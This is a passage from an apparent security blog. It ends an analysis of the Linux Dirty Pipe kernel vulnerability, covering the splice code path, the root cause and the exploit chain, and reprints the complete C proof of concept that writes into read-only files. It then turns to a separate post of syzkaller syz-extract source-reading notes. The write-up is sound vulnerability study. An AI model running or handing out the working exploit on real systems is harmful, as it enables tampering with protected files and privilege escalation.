            len = min_t(size_t, len, p_space << PAGE_SHIFT);
            // perform the actual transfer
            ret = do_splice_to(in, &offset, opipe, len, flags);
        }
        ...
        return ret;
    }

    ...
}

In do_splice_to, the kernel calls the splice_read method that matches the file system:

/*
 * Attempt to initiate a splice from a file to a pipe.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
             struct pipe_inode_info *pipe, size_t len,
             unsigned int flags)
{
    int ret;

    if (unlikely(!(in->f_mode & FMODE_READ)))
        return -EBADF;

    ret = rw_verify_area(READ, in, ppos, len);
    if (unlikely(ret < 0))
        return ret;

    if (unlikely(len > MAX_RW_COUNT))
        len = MAX_RW_COUNT;
    // call the splice_read method
    if (in->f_op->splice_read)
        return in->f_op->splice_read(in, ppos, pipe, len, flags);
    return default_file_splice_read(in, ppos, pipe, len, flags);
}

Taking ext4, the most common Linux file system, as an example, these are some of the key methods it installs:

// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
    ...
    .read_iter    = ext4_file_read_iter,
    ...
    .splice_read  = generic_file_splice_read,
    ...
};

So do_splice_to ends up calling generic_file_splice_read to carry out the transfer:

/**
 * generic_file_splice_read - splice data from file to a pipe
 * @in:      file to splice from
 * @ppos:    position in @in
 * @pipe:    pipe to splice to
 * @len:     number of bytes to splice
 * @flags:   splice modifier flags
 *
 * Description:
 *    Will read pages from given file and fill them into a pipe. Can be
 *    used as long as it has more or less sane ->read_iter().
 *
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
                 struct pipe_inode_info *pipe, size_t len,
                 unsigned int flags)
{
    struct iov_iter to;
    struct kiocb kiocb;
    unsigned int i_head;
    int ret;
    
    // build an iov_iter on top of the pipe
    iov_iter_pipe(&to, READ, pipe, len);
    i_head = to.head;
    // set up the kiocb
    init_sync_kiocb(&kiocb, in);
    kiocb.ki_pos = *ppos;
    // call call_read_iter to perform the actual data transfer !!!
    ret = call_read_iter(in, &kiocb, &to);
    // if the transfer succeeded
    if (ret > 0) {
        // update the file position and access time
        *ppos = kiocb.ki_pos;
        file_accessed(in);
    // if the transfer failed
    } else if (ret < 0) {
        to.head = i_head;
        to.iov_offset = 0;
        iov_iter_advance(&to, 0); /* to free what was emitted */
        /*
         * callers of ->splice_read() expect -EAGAIN on
         * "can't put anything in there", rather than -EFAULT.
         */
        if (ret == -EFAULT)
            ret = -EAGAIN;
    }

    return ret;
}

As the code shows, generic_file_splice_read ends up calling call_read_iter to move the data, which in turn calls the file system's own read_iter method:

static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
                     struct iov_iter *iter)
{
    return file->f_op->read_iter(kio, iter);
}

From ext4_file_operations we know that call_read_iter reaches ext4_file_read_iter:

static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
    struct inode *inode = file_inode(iocb->ki_filp);
    // a few simple checks
    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
        return -EIO;

    if (!iov_iter_count(to))
        return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
    if (IS_DAX(inode))
        return ext4_dax_read_iter(iocb, to);
#endif
    if (iocb->ki_flags & IOCB_DIRECT)
        return ext4_dio_read_iter(iocb, to);
    // files opened without O_DIRECT take this path
    return generic_file_read_iter(iocb, to);
}

That function in turn calls generic_file_read_iter:

/**
 * generic_file_read_iter - generic filesystem read routine
 * @iocb:    kernel I/O control block
 * @iter:    destination for the data read
 *
 * This is the "read_iter()" routine for all filesystems
 * that can use the page cache directly.
 * Return:
 * * number of bytes copied, even for partial reads
 * * negative error code if nothing was read
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    size_t count = iov_iter_count(iter);
    ssize_t retval = 0;

    if (!count)
        goto out; /* skip atime */

    if (iocb->ki_flags & IOCB_DIRECT) {
        ...
    }
    // Continue into the buffered read path
    retval = generic_file_buffered_read(iocb, iter, retval);
out:
    return retval;
}

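Next comes generic_file_buffered_read. The function is too long to reproduce here, so I will only summarize what it does:

It looks up the file's page cache mapping for pages that have already been cached.
- If there is no cached page, it reads the file data from disk and creates a new page cache page.
- If a cached page exists but is out of date, it refreshes that page.
At this point a page cache page is guaranteed to exist, so copy_page_to_iter is called to transfer the data on that page into the pipe.

This is exactly the function introduced earlier, so the whole splice system call can now be tied to the uninitialized-field bug on the pipe side.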

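IV. Root Cause

The vulnerability did not appear in one step. It is the combined result of two commits:

new iov_iter flavour: pipe-backed - linux commit 241699: introduces the uninitialized-field bug. Neither push_pipe nor copy_page_to_iter_pipe initializes the flags field when filling in a pipe_buffer structure.

pipe: merge anon_pipe_buf*_ops - linux commit f6dd97: before this commit, the kernel decided whether a pipe_buf could be merged into by comparing the address stored in pipe_buf->ops. This was not an elegant approach, because the function pointers inside each ops table were identical whether or not the buffer was mergeable: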

// fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations anon_pipe_buf_nomerge_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations packet_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

As you can see, this trick is rather inelegant, so commit f6dd97 refactored this code and introduced a new pipe buffer flag, PIPE_BUF_FLAG_CAN_MERGE:

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01  /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02  /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04  /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08  /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10  /* can merge buffers */     // <= newly introduced flag

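The refactoring itself is fine. Its only side effect is the new pipe buffer flag, PIPE_BUF_FLAG_CAN_MERGE.

Although the first commit introduced the uninitialized-field bug, the bug initially had little impact, because none of the existing pipe buffer flags was useful for exploitation. Once the second commit added PIPE_BUF_FLAG_CAN_MERGE, the bug became critical: through the uninitialized field, a new pipe_buf can inherit stale flags such as PIPE_BUF_FLAG_CAN_MERGE. This breaks the integrity of the pipe buffer and allows writes to pages that should never be written through the pipe, that is, pages that should not carry PIPE_BUF_FLAG_CAN_MERGE, such as page cache pages.

Note that these "read-only" pages are not protected from pipe writes by permission checks or similar mechanisms. The protection comes purely from the logic implemented by the pipe code. When that logic is flawed, the pipe can write to read-only pages, which yields an arbitrary file write.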

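V. Exploitation

From the code analysis above we can derive the following exploit chain:

Create a pipe (make sure not to pass O_DIRECT).
Write a large amount of data into the pipe so that every pipe buffer in the pipe structure has PIPE_BUF_FLAG_CAN_MERGE set in its flags.
Read all of the data back out of the pipe, releasing every pipe buffer.
Call splice to transfer data from a readable file into the pipe, using a length that is not page-aligned. The pipe buffer at the head of the pipe now has its page pointing at the page cache and its flags equal to PIPE_BUF_FLAG_CAN_MERGE.
The flags survive because they are not initialized when a pipe buffer is reused, so the PIPE_BUF_FLAG_CAN_MERGE value left over from the earlier writes is still there.
Write the target data into the pipe. Because PIPE_BUF_FLAG_CAN_MERGE is still set, the new data is merged directly into the page cache page that the pipe buffer points to.
Any later access to the file returns the modified page cache contents, which achieves an arbitrary file write at the kernel level.

Note that "accidentally" modifying the page cache through this bug does not cause the page to be written back to disk. The modified page is saved to disk only if some other part of the kernel legitimately writes to the same page and thereby marks it dirty.
The kernel does not decide whether a page cache page is dirty by checking whether its data changed. It checks the page's dirty flag, and overwriting the page cache through Dirty Pipe does not touch that flag.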
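
The chain above can be played through in a toy model. The following Go sketch is not kernel code: the pipe, pipeBuffer, and page types, the 16-byte pageSize, and the initFlags switch are all assumptions made for illustration. It only mimics the relevant behavior, namely that writes set a merge flag, draining leaves the flag in place, and splice either inherits the stale flag or clears it.

```go
package main

import "fmt"

const (
	pageSize = 16   // toy page size, far smaller than a real page
	canMerge = 0x10 // plays the role of PIPE_BUF_FLAG_CAN_MERGE
)

// page is a toy stand-in for a memory page.
type page struct{ data []byte }

// pipeBuffer is a toy stand-in for struct pipe_buffer.
type pipeBuffer struct {
	pg     *page
	off, n int
	flags  uint
}

// pipe is a ring of buffers: head is the next slot to fill, tail the next to read.
type pipe struct {
	bufs       []pipeBuffer
	head, tail int
}

// write merges into the last buffer when it is flagged mergeable and has
// room; otherwise it takes a fresh anonymous page and sets canMerge.
func (p *pipe) write(data []byte) {
	if p.head != p.tail {
		last := &p.bufs[(p.head-1)%len(p.bufs)]
		if last.flags&canMerge != 0 && last.off+last.n+len(data) <= pageSize {
			copy(last.pg.data[last.off+last.n:], data)
			last.n += len(data)
			return
		}
	}
	b := &p.bufs[p.head%len(p.bufs)]
	*b = pipeBuffer{pg: &page{data: make([]byte, pageSize)}, n: len(data), flags: canMerge}
	copy(b.pg.data, data)
	p.head++
}

// drain releases every buffer but deliberately leaves flags untouched.
func (p *pipe) drain() {
	for ; p.tail < p.head; p.tail++ {
		b := &p.bufs[p.tail%len(p.bufs)]
		b.pg, b.off, b.n = nil, 0, 0
	}
}

// splice links a file page into the next slot. With initFlags == false the
// slot keeps whatever flags it had before, which models the bug.
func (p *pipe) splice(pg *page, off, n int, initFlags bool) {
	b := &p.bufs[p.head%len(p.bufs)]
	b.pg, b.off, b.n = pg, off, n
	if initFlags {
		b.flags = 0
	}
	p.head++
}

// demo runs the exploit chain and returns the final contents of the file page.
func demo(initFlags bool) string {
	file := &page{data: []byte("AAAAAAAAAAAAAAAA")} // toy "page cache" page
	p := &pipe{bufs: make([]pipeBuffer, 2)}
	for i := 0; i < len(p.bufs); i++ {
		p.write(make([]byte, pageSize)) // fill every slot so each gets canMerge
	}
	p.drain()
	p.splice(file, 0, 1, initFlags)
	p.write([]byte("XYZ"))
	return string(file.data)
}

func main() {
	fmt.Println(demo(false)) // AXYZAAAAAAAAAAAA: the write landed in the file page
	fmt.Println(demo(true))  // AAAAAAAAAAAAAAAA: the file page is untouched
}
```

Calling demo(true) corresponds to clearing the flags when a buffer is reused, which is the general shape of the fix; the model makes no claim about the exact kernel patch.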

Since cm4all has already published a very clear PoC, it is reproduced here as is:

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];

    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }

    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }

    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

    /* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }

    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

    /* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);

    /* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

    /* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

    printf("It worked!\n");
    return EXIT_SUCCESS;
}

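The result of running it is as follows:

As shown, the exploit runs smoothly and manages to write to the file even though the file was opened read-only.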


syzkaller Source Code Reading Notes - 1

2022-03-14T16:00:00.000Z

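I. Introduction

syzkaller is an unsupervised, coverage-guided kernel fuzzer open-sourced by Google. It supports testing several operating systems, including Linux and Windows.

syzkaller consists of many components, among them:

syz-extract: resolves the constants used in syzlang
syz-sysgen: parses syzlang and extracts the described syscalls, their argument types, and the dependencies between arguments
syz-manager: launches and manages syzkaller
syz-fuzzer: the fuzzer that actually runs inside the VM
syz-executor: the test program that actually runs inside the VM

The architecture diagram is as follows:

In this article I will first cover the source code of syz-extract and syz-sysgen.

Throughout this series of notes, the arch and platform are always x86_64 Linux, and this will not be repeated.
syzkaller git checkout: 3a9d0024ba818c5b37058d9ac6fdfc0ddfa78be6
checkout Date: Fri Nov 19 13:06:38 2021 +0100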

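II. syz-extract

Purpose: resolve the constants in syzlang files to their concrete integer values and store the results in xxx.txt.const files.

1. main

The main function of syz-extract is located in sys/syz-extract/extract.go.

First, syz-extract parses the command-line arguments: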

// Kiprey: in Function `main` 
flag.Parse()
if *flagBuild && *flagBuildDir != "" {
    tool.Failf("-build and -builddir is an invalid combination")
}

The flags are defined as follows:

var (
    flagOS        = flag.String("os", runtime.GOOS, "target OS")
    flagBuild     = flag.Bool("build", false, "regenerate arch-specific kernel headers")
    flagSourceDir = flag.String("sourcedir", "", "path to kernel source checkout dir")
    flagIncludes  = flag.String("includedirs", "", "path to other kernel source include dirs separated by commas")
    flagBuildDir  = flag.String("builddir", "", "path to kernel build dir")
    flagArch      = flag.String("arch", "", "comma-separated list of arches to generate (all by default)")
)

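Next, archFileList is called to process the arguments and produce the corresponding return values.

Here:
OS is the operating system name
archArray is the slice of arch names to generate for
files is the slice of syzlang file names to analyze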

// Kiprey: in Function `main` 
OS, archArray, files, err := archFileList(*flagOS, *flagArch, flag.Args())
if err != nil {
    tool.Fail(err)
}

Next, main looks up the Extractor registered for OS. If the OS is unknown, the lookup yields nil and main fails immediately:

// Kiprey: in Function `main` 
extractor := extractors[OS]
if extractor == nil {
    tool.Failf("unknown os: %v", OS)
}

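The extractors map is shown below. It associates each OS with an instance of a type that implements the Extractor interface. The implementation for Linux (that is, its three methods) lives in sys/syz-extract/linux.go:

We will look at the three methods later.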

type Extractor interface {
    prepare(sourcedir string, build bool, arches []*Arch) error
    prepareArch(arch *Arch) error
    processFile(arch *Arch, info *compiler.ConstInfo) (map[string]uint64, map[string]bool, error)
}

var extractors = map[string]Extractor{
    targets.Akaros:  new(akaros),
    targets.Linux:   new(linux), // sys/syz-extract/linux.go
    targets.FreeBSD: new(freebsd),
    targets.Darwin:  new(darwin),
    targets.NetBSD:  new(netbsd),
    targets.OpenBSD: new(openbsd),
    "android":       new(linux),
    targets.Fuchsia: new(fuchsia),
    targets.Windows: new(windows),
    targets.Trusty:  new(trusty),
}

Back in main, syz-extract uses the OS string, the archArray slice, and the slice of syzlang file names to build the corresponding slice of Arch structures:

// Kiprey: in function `main`
arches, err := createArches(OS, archArray, files)
if err != nil {
    tool.Fail(err)
}
if *flagSourceDir == "" {
    tool.Fail(fmt.Errorf("provide path to kernel checkout via -sourcedir " +
                         "flag (or make extract SOURCEDIR)"))
}

The preparation is nearly complete. Next, the extractor performs its initialization:

// Kiprey: in function main
if err := extractor.prepare(*flagSourceDir, *flagBuild, arches); err != nil {
    tool.Fail(err)
}

This ends up calling the prepare method in sys/syz-extract/linux.go:

// Kiprey: in sys/syz-extract/linux.go
func (*linux) prepare(sourcedir string, build bool, arches []*Arch) error {
    if build {
        // Run 'make mrproper', otherwise out-of-tree build fails.
        // However, it takes unreasonable amount of time,
        // so first check few files and if they are missing hope for best.
        for _, a := range arches {
            arch := a.target.KernelArch
            if osutil.IsExist(filepath.Join(sourcedir, ".config")) ||
                osutil.IsExist(filepath.Join(sourcedir, "init/main.o")) ||
                osutil.IsExist(filepath.Join(sourcedir, "include/config")) ||
                osutil.IsExist(filepath.Join(sourcedir, "include/generated/compile.h")) ||
                osutil.IsExist(filepath.Join(sourcedir, "arch", arch, "include", "generated")) {
                fmt.Printf("make mrproper ARCH=%v\n", arch)
                out, err := osutil.RunCmd(time.Hour, sourcedir, "make", "mrproper", "ARCH="+arch,
                    "-j", fmt.Sprint(runtime.NumCPU()))
                if err != nil {
                    return fmt.Errorf("make mrproper failed: %v\n%s", err, out)
                }
            }
        }
    } else {
        if len(arches) > 1 {
            return fmt.Errorf("more than 1 arch is invalid without -build")
        }
    }
    return nil
}

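If regenerating the Linux kernel headers was not requested, prepare only performs a simple check: it rejects requests for more than one arch. If regeneration was requested with -build, it runs make mrproper in the Linux kernel source tree whenever leftover build artifacts are found there.

Back in main, the next step is to create the channel used to communicate between goroutines and to start the parallel workers:

A goroutine is Go's lightweight thread. The statement after the go keyword runs in a new goroutine.

jobC := make(chan interface{}, len(archArray)*len(files))
// Put the Arch structures into the jobC channel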
for _, arch := range arches {
    jobC <- arch
}

for p := 0; p < runtime.GOMAXPROCS(0); p++ {
    go worker(extractor, jobC)
}

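Once the workers are running, main has to wait for them to finish before it can save the results to files, which calls for synchronization between goroutines. Note the <-arch.done and <-f.done statements in the code: each blocks on its channel until a value arrives or the channel is closed. When a worker calls close on the channel, the pending receive returns immediately and main continues. syz-extract thus uses channels to coordinate its goroutines.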

// Kiprey: in function `main`
constFiles := make(map[string]*compiler.ConstFile)
for _, file := range files {
    constFiles[file] = compiler.NewConstFile()
}
for _, arch := range arches {
    fmt.Printf("generating %v/%v...\n", arch.target.OS, arch.target.Arch)
    <-arch.done
    if arch.err != nil {
        failed = true
        fmt.Printf("%v\n", arch.err)
        continue
    }
    for _, f := range arch.files {
        <-f.done
        if f.err != nil {
            failed = true
            fmt.Printf("%v: %v\n", f.name, f.err)
            continue
        }
        constFiles[f.name].AddArch(f.arch.target.Arch, f.consts, f.undeclared)
    }
}

The rest of the code saves the results to the .const files. There is nothing else of interest here:

// Kiprey: in function `main`
for file, cf := range constFiles {
    outname := filepath.Join("sys", OS, file+".const")
    data := cf.Serialize()
    if len(data) == 0 {
        os.Remove(outname)
        continue
    }
    if err := osutil.WriteFile(outname, data); err != nil {
        tool.Failf("failed to write output file: %v", err)
    }
}

if !failed && *flagArch == "" {
    failed = checkUnsupportedCalls(arches)
}
for _, arch := range arches {
    if arch.build {
        os.RemoveAll(arch.buildDir)
    }
}
if failed {
    os.Exit(1)
}

2. archFileList

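archFileList processes the arguments passed in. It is quite short.

First, the caller passes in the OS string, the arch string, and the slice of syzlang file paths:

func archFileList(os, arch string, files []string) (string, []string, []string, error)

Then archFileList handles android as a special case, splits the arch argument on commas, and stores the pieces in the arches slice. If no arch was specified, every arch known for the OS is added to arches.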

// Kiprey: in archFileList Function
// Note: this is linux-specific and should be part of Extractor and moved to linux.go.
android := false
if os == "android" {
    android = true
    os = targets.Linux
}
var arches []string
if arch != "" {
    arches = strings.Split(arch, ",")
} else {
    for arch := range targets.List[os] {
        arches = append(arches, arch)
    }
    if android {
        arches = []string{targets.I386, targets.AMD64, targets.ARM, targets.ARM64}
    }
    sort.Strings(arches)
}

Here, targets.List is a map (the List variable in sys/targets/targets.go) that holds a lot of information about each OS and about that OS on each specific arch. A trimmed-down excerpt:

// nolint: lll
var List = map[string]map[string]*Target{
    ...,
    Linux: {
        AMD64: {
            PtrSize:          8,
            PageSize:         4 << 10,
            LittleEndian:     true,
            CFlags:           []string{"-m64"},
            Triple:           "x86_64-linux-gnu",
            KernelArch:       "x86_64",
            KernelHeaderArch: "x86",
            NeedSyscallDefine: func(nr uint64) bool {
                // Only generate defines for new syscalls
                // (added after commit 8a1ab3155c2ac on 2012-10-04).
                return nr >= 313
            },
        },
        I386: {
            VMArch:           AMD64,
            PtrSize:          4,
            PageSize:         4 << 10,
            Int64Alignment:   4,
            LittleEndian:     true,
            CFlags:           []string{"-m32"},
            Triple:           "x86_64-linux-gnu",
            KernelArch:       "i386",
            KernelHeaderArch: "x86",
        },
        ...
    },
    ...
}

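However, the loop for arch := range targets.List[os] only takes the keys of this map, which are the architecture name strings, so arches ends up holding the sorted architecture names for the chosen OS.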

Now back to archFileList:

// Kiprey: in archFileList Function
if len(files) == 0 {
        matches, err := filepath.Glob(filepath.Join("sys", os, "*.txt"))
        if err != nil || len(matches) == 0 {
            return "", nil, nil, fmt.Errorf("failed to find sys files: %v", err)
        }
        manualFiles := map[string]bool{
            // Not upstream, generated on https://github.com/multipath-tcp/mptcp_net-next
            "vnet_mptcp.txt": true,
            // Was in linux-next, but then was removed, fate is unknown.
            "dev_watch_queue.txt": true,
            // Not upstream, generated on:
            // https://chromium.googlesource.com/chromiumos/third_party/kernel d2a8a1eb8b86
            "dev_bifrost.txt": true,
            // ION support was removed from kernel.
            // We plan to leave the descriptions for some time as is and later remove them.
            "dev_ion.txt": true,
            // Not upstream, generated on unknown tree.
            "dev_img_rogue.txt": true,
        }
        androidFiles := map[string]bool{
            "dev_tlk_device.txt": true,
            // This was generated on:
            // https://source.codeaurora.org/quic/la/kernel/msm-4.9 msm-4.9
            "dev_video4linux.txt": true,
            // This was generated on:
            // https://chromium.googlesource.com/chromiumos/third_party/kernel 3a36438201f3
            "fs_incfs.txt": true,
        }
        for _, f := range matches {
            f = filepath.Base(f)
            if manualFiles[f] || os == targets.Linux && android != androidFiles[f] {
                continue
            }
            files = append(files, f)
        }
        sort.Strings(files)
    }

If the files argument is empty, syz-extract tries to collect the files automatically. In this part of the code:

matches, err := filepath.Glob(filepath.Join("sys", os, "*.txt"))
if err != nil || len(matches) == 0 {
    return "", nil, nil, fmt.Errorf("failed to find sys files: %v", err)
}

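syz-extract expands the glob sys/linux/*.txt and stores the matching paths in matches.

The loop below then skips the manually maintained files listed in manualFiles. For Linux it also skips every file whose presence in androidFiles does not match the android setting: a normal Linux run drops the Android-only files, while an android run keeps only those. Finally, the resulting slice is sorted: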

// Kiprey: in archFileList Function
for _, f := range matches {
    f = filepath.Base(f)
    if manualFiles[f] || os == targets.Linux && android != androidFiles[f] {
        continue
    }
    files = append(files, f)
}
sort.Strings(files)
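
The skip condition is compact enough to be misread, so here it is isolated in a small sketch. The shouldSkip helper and the file names are hypothetical; only the boolean expression mirrors the loop above. In Go, != binds tighter than &&, which binds tighter than ||.

```go
package main

import "fmt"

// shouldSkip mirrors the condition
//   manualFiles[f] || os == targets.Linux && android != androidFiles[f]
// with the OS comparison passed in as isLinux.
func shouldSkip(name string, isLinux, android bool, manual, androidOnly map[string]bool) bool {
	return manual[name] || isLinux && android != androidOnly[name]
}

func main() {
	manual := map[string]bool{"manual.txt": true}
	androidOnly := map[string]bool{"android.txt": true}
	for _, name := range []string{"manual.txt", "android.txt", "plain.txt"} {
		fmt.Printf("%s: skipped on linux=%v, skipped on android=%v\n", name,
			shouldSkip(name, true, false, manual, androidOnly),
			shouldSkip(name, true, true, manual, androidOnly))
	}
}
```

A missing map key reads as false, so a file that appears in neither map is kept for plain Linux and skipped for android.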

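The function ends by returning the results:

// Kiprey: in archFileList Function
return os, arches, files, nil

3. createArches

This function builds the slice of Arch structures that corresponds to the arguments. It is short, so the notes are embedded in the code as comments: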

func createArches(OS string, archArray, files []string) ([]*Arch, error) {
    var arches []*Arch
    // Iterate over the archArray slice
    for _, archStr := range archArray {
        // Determine the build directory
        buildDir := ""
        if *flagBuild {
            dir, err := ioutil.TempDir("", "syzkaller-kernel-build")
            if err != nil {
                return nil, fmt.Errorf("failed to create temp dir: %v", err)
            }
            buildDir = dir
        } else if *flagBuildDir != "" {
            buildDir = *flagBuildDir
        } else {
            buildDir = *flagSourceDir
        }
        // Look up the `Target` structure for this OS and arch in targets.List
        target := targets.Get(OS, archStr)
        if target == nil {
            return nil, fmt.Errorf("unknown arch: %v", archStr)
        }
        // Create the Arch structure
        arch := &Arch{
            // Information specific to this OS and arch
            target:      target,
            // Path to the kernel source
            sourceDir:   *flagSourceDir,
            // Additional kernel header include paths
            includeDirs: *flagIncludes,
            // Build directory
            buildDir:    buildDir,
            // Whether the arch-specific kernel headers must be regenerated
            build:       *flagBuild,
            // Channel for goroutine communication; it signals that this arch has been processed
            done:        make(chan bool),
        }
        // Attach the syzlang file names to the Arch structure
        for _, f := range files {
            arch.files = append(arch.files, &File{
                arch: arch,
                name: f,
                // Channel for goroutine communication; it signals that this file has been processed
                done: make(chan bool),
            })
        }
        // Append the new Arch structure to the arches slice
        arches = append(arches, arch)
    }
    return arches, nil
}

4. worker

worker does the actual work of resolving the constants:

func worker(extractor Extractor, jobC chan interface{})

The elements that main initially puts into the jobC channel are always Arch structures, so at first the switch inside worker sees a value of type *Arch:

// Kiprey: in function `worker`
for job := range jobC {
    // j is the object taken from the jobC channel, initially an *Arch
    switch j := job.(type) {
        // This branch is always taken first
        case *Arch:
            // Run processArch to generate the const info
            infos, err := processArch(extractor, j)
            j.err = err
            close(j.done)
            if j.err == nil {
                for _, f := range j.files {
                    f.info = infos[filepath.Join("sys", j.target.OS, f.name)]
                    jobC <- f
                }
            }
        case *File:
            j.consts, j.undeclared, j.err = processFile(extractor, j.arch, j)
            close(j.done)
    }
}

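Note that j is the Arch structure taken from jobC. Once processArch has finished, worker looks up each file's info in the infos map and stores it in the corresponding element of the Arch structure's files slice.

It then executes jobC <- f, which puts that File structure into the jobC channel.

Because worker keeps reading from jobC in a loop, a worker will next pick up the File structure that was just enqueued and call processFile on it. In processFile, syz-extract obtains the integer value (for example 2) of each constant (for example O_RDWR).

One more key point in worker: after each processXXX call returns, worker calls close(j.done) to close the channel. The purpose is to tell the main goroutine that this piece of work is finished. It works somewhat like using a semaphore for thread synchronization.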

5. processArch

processArch takes the Extractor and an Arch structure and generates the const info.

func processArch(extractor Extractor, arch *Arch) (map[string]*compiler.ConstInfo, error) {
    errBuf := new(bytes.Buffer)
    // Define the error handler
    eh := func(pos ast.Pos, msg string) {
        fmt.Fprintf(errBuf, "%v: %v\n", pos, msg)
    }
    // Parse the syzlang files matching sys/linux/*.txt into a collection of ASTs
    // top is therefore the root of that AST forest
    top := ast.ParseGlob(filepath.Join("sys", arch.target.OS, "*.txt"), eh)
    if top == nil {
        return nil, fmt.Errorf("%v", errBuf.String())
    }
    // Call compiler.ExtractConsts to obtain the const info for each syzlang file
    infos := compiler.ExtractConsts(top, arch.target, eh)
    if infos == nil {
        return nil, fmt.Errorf("%v", errBuf.String())
    }
    // Let the Extractor prepare for this arch
    if err := extractor.prepareArch(arch); err != nil {
        return nil, err
    }
    return infos, nil
}

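Here, compiler.ExtractConsts is just a simple wrapper that returns the fileConsts field of the syzlang compilation result.

The res.fileConsts field maps each syzlang file name to the constants it uses and to the header files it includes. All of this is needed later to resolve the constants to concrete integers.

extractor.prepareArch, implemented in linux.go, mainly defines a few header files: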

"stdarg.h": `
#pragma once
#define va_list __builtin_va_list
#define va_start __builtin_va_start
#define va_end __builtin_va_end
#define va_arg __builtin_va_arg
#define va_copy __builtin_va_copy
#define __va_copy __builtin_va_copy
`,

"asm/a.out.h":    "",
"asm/prctl.h":    "",
"asm/mce.h":      "",
"uapi/asm/msr.h": "",

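Some arches' kernel sources may lack these files, so they have to be supplied manually. After that, extractor.prepareArch runs the Linux kernel make once more.

Back in processArch, the function finally returns the const info collected earlier to its caller.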

6. processFile

processFile is only a wrapper around extractor.processFile that mainly performs a few checks:

func processFile(extractor Extractor, arch *Arch, file *File) (map[string]uint64, map[string]bool, error) {
    inname := filepath.Join("sys", arch.target.OS, file.name)
    if file.info == nil {
        return nil, nil, fmt.Errorf("const info for input file %v is missing", inname)
    }
    if len(file.info.Consts) == 0 {
        return nil, nil, nil
    }
    return extractor.processFile(arch, file.info)
}

The actual lookup of const values happens in extractor.processFile:

func (*linux) processFile(arch *Arch, info *compiler.ConstInfo) (map[string]uint64, map[string]bool, error)

In linux.go, processFile first filters out the cases it does not handle:

// Kiprey: in function processFile of sys/syz-extract/linux.go
if strings.HasSuffix(info.File, "_kvm.txt") &&
    (arch.target.Arch == targets.ARM || arch.target.Arch == targets.RiscV64) {
    // Hack: KVM is not supported on ARM anymore. We may want some more official support
    // for marking descriptions arch-specific, but so far this combination is the only
    // one. For riscv64, KVM is not supported yet but might be in the future.
